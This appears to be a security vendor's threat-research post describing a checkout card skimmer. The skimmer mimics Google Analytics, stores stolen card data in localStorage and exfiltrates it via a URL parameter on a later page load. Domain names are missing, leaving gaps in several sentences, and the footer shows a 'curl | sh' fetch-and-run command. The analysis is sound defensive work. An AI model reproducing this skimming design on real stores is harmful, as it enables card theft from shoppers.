Sansec logo

Postponed Exfiltration Evades Detection


by Sansec Forensics Team

Published in Threat Research − May 09, 2023

Criminals have come up with a clever way to steal customer data only after the regular checkout flow. This stealthy attack is very hard to detect.

Postponed Exfiltration Evades Detection

The domain has recently emerged as a threat, employing various cunning techniques to evade detection and targeting unsuspecting users, but what makes it especially deceptive is its ability to postpone exfiltration until after the checkout flow, making it an alarming threat to online shoppers.

Pretense of Legitimacy

To appear authentic, checks the referrer address. If it doesn't match the store's URL, it serves a script from This helps it disguise its true identity and intentions.

Furthermore, the loader masquerades as a Google Analytics script and goes the extra mile to mimic legitimate behavior. For instance, it sets localStorage values like localStorage.setItem("font", "Helvetica"), creating the illusion of a genuine script.

Surprisingly, no obfuscation is used intentionally, possibly exploiting users' trust in familiar scripts.

Loading & Exfiltration

When users click the checkout button, collects their credit card details. It enriches this data with the user's IP address and user agent by calling

The serialized data is stored in localStorage under the key _sutoken.

On subsequent page requests, the loader checks localStorage and adds a serv parameter to the URL, such as:<serialized_cc_data>.

This enables the exfiltration of stolen data to a remote server.

Indicators of Compromise (IOCs)



class DetachCheckout extends DetachHandler
class DetachCheckout extends DetachHandler

Read more

Scan your store now
for malware & vulnerabilities

$ curl | sh

eComscan is the most thorough security scanner for Magento, Adobe Commerce, Shopware, WooCommerce and many more.

Stay up to date with the latest eCommerce attacks

Sansec logo

experts in eCommerce security


Terms & Conditions
Privacy & Cookie Policy
Company Reg 77165187
Tax NL860920306B01